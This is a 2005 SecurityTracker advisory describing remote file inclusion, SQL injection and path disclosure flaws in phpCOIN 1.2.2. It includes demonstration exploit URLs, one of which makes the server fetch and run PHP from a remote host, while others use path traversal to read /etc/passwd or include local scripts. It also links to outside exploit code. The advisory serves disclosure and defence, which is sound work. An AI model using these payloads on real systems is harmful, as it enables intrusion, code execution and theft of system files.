phpCOIN Include File Bug in 'coin_includes/db.php' Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1015345
SecurityTracker URL:  http://securitytracker.com/id/1015345
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Dec 13 2005
Impact:   Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, User access via network
Exploit Included:  Yes
Version(s): 1.2.2
Description:   rgod reported several vulnerabilities in phpCOIN. A remote user can execute arbitrary code on the target system. A remote user can inject SQL commands. A remote user can also determine the installation path.

The 'coin_includes/db.php' script does not properly validate user-supplied input. If register_globals and allow_url_fopen are enabled, a remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/[path]/config.php?_CCFG[_PKG_PATH_DBSE]=http://[location]

If allow_url_fopen is disabled, a remote user can include and execute local files.

Some demonstration exploit URLs are provided:

http://[target]/[path]/config.php?_CCFG[_PKG_PATH_DBSE]=../../../../../../../../etc/passwd%00

http://[target]/[path]/config.php?_CCFG[_PKG_PATH_DBSE]=../../../../../../../../script.php%00

The software does not properly validate user-supplied input in certain cookie values. If magic_quotes_gpc is disabled, a remote user can supply a specially crafted cookie value to execute SQL commands on the underlying database.

Some demonstration exploit code is available at:

http://rgod.altervista.org/phpcoin_122_sql_xpl.html

A remote user can request the following URL to cause the system to disclose the installation path:

http://[target]/[path]/config.php
